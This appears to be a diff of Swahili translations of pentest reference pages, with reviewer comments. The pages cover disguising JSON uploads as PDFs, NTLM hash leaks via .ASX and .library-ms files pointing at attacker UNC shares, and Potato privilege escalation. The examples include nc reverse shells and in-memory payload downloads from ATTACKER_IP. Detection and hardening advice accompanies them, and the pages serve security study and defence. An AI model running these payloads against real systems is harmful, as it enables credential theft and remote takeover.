Jinsi ya kuepuka detection za aina ya faili kwa kupakia faili halali ya JSON hata kama haikuruhusiwa kwa kuiga faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
How to avoid file type detections by uploading a valid JSON file even if not allowed by faking a PDF file (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmmagic` library**: Iwapo tu magic bytes `%PDF` ziko katika 1024 ya kwanza, inachukuliwa kuwa halali (pata mfano kutoka kwenye post)
- **`pdflib` library**: Weka muundo bandia wa PDF ndani ya field ya JSON ili library ianze kuifikiria kuwa ni pdf (pata mfano kutoka kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa kuliko hiyo ili isiweze kuchambua yaliyomo kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani kuwa ni PDF
- **`mmagic` library**: Iwapo tu magic bytes `%PDF` ziko katika 1024 za kwanza za faili, inachukuliwa kuwa halali (angalia mfano kwenye chapisho).
- **`pdflib` library**: Ongeza muundo wa PDF wa uongo ndani ya field ya JSON ili maktaba ifikiri ni PDF (angalia mfano kwenye chapisho).
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwenye faili. Unda JSON kubwa kuliko hiyo ili haiwezi kuchambua yaliyomo kama JSON, kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF.
## Marejeo
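Review bot: the library name was altered in the rewritten bullet: "`mmagic` library" should remain "`mmmagic` library" (three m's), which is the npm libmagic binding the cited Doyensec post refers to; identifiers must not change in translation. "Funguo za `imagecopyresized` na `imagecopyresampled`" mistranslates "functions" as "keys" ("funguo"); the removed "Funsioni" was at least recognisable, and "functions" or "kazi" would be correct. The ImageTragick line "(ImageMagick , 7.0.1-1)" has lost its operator and carries a stray space before the comma; 7.0.1-1 is the 7.x release that fixed the issue, so the affected set is versions before it and the text should read "(ImageMagick < 7.0.1-1)". The three JSON-as-PDF bullets are a good illustration of why sniffing the first bytes is not a file type check; one sentence for maintainers would round it off: validate with the parser that will actually consume the file, store uploads under a server-chosen name, and serve them with a fixed non-executable content type.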
@ -405,5 +430,7 @@ Jinsi ya kuepuka detection za aina ya faili kwa kupakia faili halali ya JSON hat
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
- [0xdf HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Microsoft mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,7 +1,66 @@
# Mahali pa kuiba NTLM creds
# Places to steal NTLM creds
{{#include ../../banners/hacktricks-training.md}}
**Angalia mawazo mazuri kutoka [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) kutoka kwa upakuaji wa faili ya microsoft word mtandaoni hadi chanzo cha ntlm leaks: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md na [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**
**Angalia mawazo mazuri yote kutoka [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) — kuanzia kupakua faili ya Microsoft Word mtandaoni hadi kwenye ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md na [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**
### Orodha za kucheza za Windows Media Player (.ASX/.WAX)
Ikiwa unaweza kumfanya target kufungua au kutazama awali orodha ya kucheza ya Windows Media Player unayodhibiti, unaweza leak NetNTLMv2 kwa kuelekeza kipengee kwenye path ya UNC. WMP itajaribu kupata media iliyorejelewa kupitia SMB na itauthenticate implicitly.
Mfano payload:
```xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
```
Mtiririko wa ukusanyaji na cracking:
```bash
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
```
### ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer inashughulikia kwa njia isiyo salama faili za .library-ms wakati zinapofunguliwa moja kwa moja ndani ya archive ya ZIP. Ikiwa ufafanuzi wa library unaelekeza kwenye njia ya mbali ya UNC (mfano, \\attacker\share), kuvinjari/kuanzisha tu .library-ms ndani ya ZIP kunasababisha Explorer kuorodhesha UNC na kutuma uthibitisho wa NTLM kwa mshambuliaji. Hii inatoa NetNTLMv2 ambayo inaweza kuvunjwa offline au ku-relay.
Mfano mdogo wa .library-ms unaoelekeza kwenye UNC ya mshambuliaji
```xml
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
```
Hatua za uendeshaji
- Unda faili .library-ms kwa kutumia XML iliyo hapo juu (weka IP/hostname yako).
- Weka kwenye ZIP (kwa Windows: Send to → Compressed (zipped) folder) kisha ukabidhi ZIP kwa lengo.
- Endesha NTLM capture listener na usubiri athiriwa afungue .library-ms kutoka ndani ya ZIP.
## Marejeo
- [HTB Fluffy ZIP .libraryms auth leak (CVE202524071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)](https://0xdf.gitlab.io/2025/09/20/htb-fluffy.html)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Morphisec 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/)
{{#include ../../banners/hacktricks-training.md}}
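Review bot: the new reference "[HTB Fluffy ZIP .libraryms auth leak (CVE202524071/24055) ...]" lost its hyphens and should read ".library-ms" and "CVE-2025-24071/24055", matching the section heading above it. Both technique sections are "###" headings with no "##" parent, while the references use "## Marejeo"; make the two technique headings "##" for a consistent outline. The ASX sample uses the placeholder ATTACKER_IP but the .library-ms sample hard-codes 10.10.14.2; use the same placeholder in both so readers do not mistake the lab address for part of the format. The page says the captured NetNTLMv2 can be cracked or relayed but gives no countermeasure; since the reference list already points at the Morphisec write-up, a short mitigation line belongs here: apply the vendor update for CVE-2025-24071, block outbound SMB (TCP/445) and WebDAV from workstations to untrusted networks, restrict outgoing NTLM with the "Network security: Restrict NTLM" policies, and require SMB signing to blunt relay. That is what makes these two sections actionable for the blue team as well.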

View File

@ -24,21 +24,22 @@ privilege-escalation-abusing-tokens.md
## Requirements and common gotchas
All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges:
Mbinu zote zifuatazo zinategemea kuabusu huduma yenye uwezo wa impersonation yenye vibali kutoka kwa muktadha ambao unashikilia moja ya ya vibali vifuatavyo:
- SeImpersonatePrivilege (maarufu zaidi) or SeAssignPrimaryTokenPrivilege
- Ngazi ya uaminifu ya juu haitegemeeki ikiwa token tayari ina SeImpersonatePrivilege (kawaida kwa akaunti za huduma nyingi kama IIS AppPool, MSSQL, n.k.)
- SeImpersonatePrivilege (ya kawaida zaidi) au SeAssignPrimaryTokenPrivilege
- High integrity is not required if the token already has SeImpersonatePrivilege (kawaida kwa akaunti nyingi za huduma kama IIS AppPool, MSSQL, n.k.)
Check privileges quickly:
Angalia vibali haraka:
```cmd
whoami /priv | findstr /i impersonate
```
Operational notes:
Vidokezo vya uendeshaji:
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
- RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
- EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running.
- Ikiwa shell yako inaendesha chini ya token iliyopunguzwa ambayo haijumuishi SeImpersonatePrivilege (kwa kawaida kwa Local Service/Network Service katika muktadha fulani), pata tena sifa za akaunti kwa kutumia FullPowers, kisha endesha Potato. Mfano: `FullPowers.exe -c "cmd /c whoami /priv" -z`
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). Katika mazingira yaliyofungwa ambapo Spooler imezimwa baada ya PrintNightmare, pendelea RoguePotato/GodPotato/DCOMPotato/EfsPotato.
- RoguePotato requires an OXID resolver reachable on TCP/135. Ikiwa egress imezuiwa, tumia redirector/port-forwarder (angalia mfano hapo chini). Toleo la zamani lilihitaji bendera -f.
- EfsPotato/SharpEfsPotato wanatumia MS-EFSR; ikiwa pipa moja imezuiwa, jaribu pipa mbadala (lsarpc, efsrpc, samr, lsass, netlogon).
- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; jaribu pipa/usafirishaji tofauti au hakikisha huduma lengwa inaendelea kuendesha.
## Demo ya Haraka
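Review bot: several added bullets translate only their second sentence and leave the first in English: "High integrity is not required if the token already has SeImpersonatePrivilege (kawaida kwa ...)", "PrintSpoofer needs the Print Spooler service ... Katika mazingira yaliyofungwa ...", "RoguePotato requires an OXID resolver ... Ikiwa egress imezuiwa ..." and "Error 0x6d3 during RpcBindingSetAuthInfo typically indicates ... jaribu pipa/usafirishaji tofauti ...". Translate each bullet as a whole or leave it whole in English. "pipa" is a mistranslation of "named pipe" ("pipa" is a barrel); keep "pipe" as the technical term, as the removed line "ikiwa pipe moja inashindwa" did. The change from "kuabusu" to "kutumia vibaya" in the opening sentence is an improvement and should stay. The requirements list doubles as the hardening checklist: every technique on the page is moot for a service account that does not hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which is exactly what the "Service account hardening" bullet further down says, so a cross-reference here would help.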
@ -58,8 +59,8 @@ NULL
```
Vidokezo:
- Unaweza kutumia -i kuanzisha interactive process kwenye current console, au -c kuendesha one-liner.
- Inahitaji Spooler service. Ikiwa imezimwa, hii itashindwa.
- Unaweza kutumia -i kuanzisha interactive process katika console ya sasa, au -c kuendesha one-liner.
- Inahitaji Spooler service. Ikiwa imezimwa, haitafanya kazi.
### RoguePotato
```bash
@ -67,7 +68,7 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
Ikiwa outbound 135 imezuiwa, pivot the OXID resolver kupitia socat kwenye redirector yako:
Ikiwa trafiki ya kwenda nje kwa port 135 imezuiwa, pivot OXID resolver kupitia socat kwenye redirector wako:
```bash
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
@ -111,7 +112,7 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su
nt authority\system
```
Kidokezo: Ikiwa pipe moja inashindwa au EDR inaizuia, jaribu pipes nyingine zinazoungwa mkono:
Kidokezo: Ikiwa pipa moja itashindwa au EDR italizuia, jaribu pipa nyingine zinazoungwa mkono:
```text
EfsPotato <cmd> [pipe]
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
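Review bot: "Ikiwa pipa moja itashindwa ... jaribu pipa nyingine" again renders the named pipe as "pipa" (barrel); the usage line directly below keeps "pipe -> lsarpc|efsrpc|samr|lsass|netlogon", so the prose should use "pipe" too. "EDR italizuia" could say what is being blocked, namely the bind to that named pipe, because that is the behaviour an EDR rule keys on; the list of alternative pipe names is equally useful as a detection list for unexpected MS-EFSR binds from non-administrative service accounts.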
@ -123,13 +124,13 @@ pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
Vidokezo:
- Inafanya kazi katika Windows 8/8.111 na Server 20122022 wakati SeImpersonatePrivilege ipo.
- Inafanya kazi kwenye Windows 8/8.111 na Server 20122022 pale SeImpersonatePrivilege inapatikana.
### DCOMPotato
![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
DCOMPotato inatoa matoleo mawili zinazolenga service DCOM objects ambazo kwa chaguo-msingi huweka RPC_C_IMP_LEVEL_IMPERSONATE. Jenga au tumia binaries zilizotolewa kisha endesha amri yako:
DCOMPotato inatoa toleo mbili zinazolenga service DCOM objects ambazo kwa chaguo-msingi hutumia RPC_C_IMP_LEVEL_IMPERSONATE. Jenga au tumia binaries zilizotolewa kisha endesha amri yako:
```cmd
# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"
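Review bot: "Inafanya kazi kwenye Windows 8/8.111 na Server 20122022" carries forward a defect from the removed line: the range dashes were dropped, so the version ranges read as the nonsense numbers "8.111" and "20122022". Restore them as "Windows 8/8.1-11" and "Server 2012-2022", which is what both the old and new lines intend.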
@ -137,9 +138,9 @@ PrinterNotifyPotato.exe "cmd /c whoami"
# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"
```
### SigmaPotato (imeboreshwa fork ya GodPotato)
### SigmaPotato (fork ya GodPotato iliyosasishwa)
SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kwa kutumia .NET reflection na PowerShell reverse shell helper.
SigmaPotato inaongeza vipengele vya kisasa kama utekelezaji ndani ya kumbukumbu kupitia .NET reflection na msaidizi wa PowerShell reverse shell.
```powershell
# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
@ -148,13 +149,13 @@ SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kwa kutumia
# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
```
## Vidokezo vya ugundaji na kuimarisha
## Utambuzi na vidokezo vya kuimarisha
- Angalia processes zinazounda named pipes na mara moja kuita token-duplication APIs ikifuatiwa na CreateProcessAsUser/CreateProcessWithTokenW. Sysmon inaweza kuonyesha telemetry muhimu: Event ID 1 (process creation), 17/18 (named pipe created/connected), na command lines zinazozalisha child processes kama SYSTEM.
- Spooler hardening: Kuizima Print Spooler service kwenye servers ambapo haitegemeiuzu huzuia PrintSpoofer-style local coercions kupitia spoolss.
- Service account hardening: Punguza utoaji wa SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege kwa custom services. Fikiria kuendesha services chini ya virtual accounts zenye least privileges zinazohitajika na kuziwekea isolations kwa service SID na write-restricted tokens inapowezekana.
- Network controls: Ku/block outbound TCP/135 au kuzuia RPC endpoint mapper traffic kunaweza kuvunja RoguePotato isipokuwa internal redirector ipo.
- EDR/AV: Zana hizi zote zina signatures nyingi. Recompiling from source, kubadili majina ya symbols/strings, au kutumia in-memory execution kunaweza kupunguza detection lakini haitashinda behavioral detections imara.
- Fuatilia mchakato unaounda named pipes na mara moja kuita token-duplication APIs ikifuatiwa na CreateProcessAsUser/CreateProcessWithTokenW. Sysmon inaweza kuonyesha telemetry muhimu: Event ID 1 (utengenezaji wa process), 17/18 (named pipe imeundwa/imeunganishwa), na mistari ya amri inayozalisha mchakato wa mtoto kama SYSTEM.
- Spooler hardening: Kuzima huduma ya Print Spooler kwenye servers zisizohitajika kunazuia shambulio za ndani za aina ya PrintSpoofer kupitia spoolss.
- Service account hardening: Punguza utoaji wa SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege kwa services maalum. Fikiria kuendesha services chini ya virtual accounts zenye vibali vya chini kabisa vinavyohitajika na kuzitenga kwa kutumia service SID na write-restricted tokens pale inapowezekana.
- Network controls: Kuziba outbound TCP/135 au kupunguza trafiki ya RPC endpoint mapper kunaweza kuvunja RoguePotato isipokuwa redirector wa ndani upo.
- EDR/AV: Zana hizi zote zina signatures nyingi. Kucompile tena kutoka source, kubadilisha symbols/strings, au kutumia utekelezaji kwa memory kunaweza kupunguza utambuzi lakini haitaweza kuzuia utambuzi wa tabia thabiti.
## Marejeo
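Review bot: the rewritten Spooler bullet (line starting "Spooler hardening: Kuzima huduma ya Print Spooler kwenye servers zisizohitajika") changes the meaning: "servers zisizohitajika" reads as "unneeded servers", whereas the point is to disable the service on servers where the service is not needed. Suggest "kwenye servers ambako haihitajiki". Smaller agreement fixes in the same hunk: the first bullet should be plural, "Fuatilia michakato inayounda named pipes ..." rather than "mchakato unaounda", and "mchakato wa mtoto" reads better as "michakato tanzu" to match that plural subject. The detection content itself is fine as translated: Sysmon Event ID 1 for process creation and 17/18 for named pipe created/connected are the right signals for the pipe-then-impersonate pattern the bullet describes.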
@ -167,5 +168,7 @@ SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kwa kutumia
- [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
- [FullPowers Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
{{#include ../../banners/hacktricks-training.md}}
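Review bot: the two references added at the end of the list (FullPowers and the HTB Media writeup) are not cited by anything in the visible hunks, so either the body text that relies on them sits in an earlier hunk outside this view or they are dangling. If it is the latter, the natural home is the service-account hardening bullet, which could note that a service token stripped of SeImpersonatePrivilege can in some cases regain its default privilege set (the stated purpose of the FullPowers reference), which is precisely why that bullet recommends not granting the privilege in the first place. Style point: the existing entries are bare URL links while the two new ones are titled links; pick one form for the whole list.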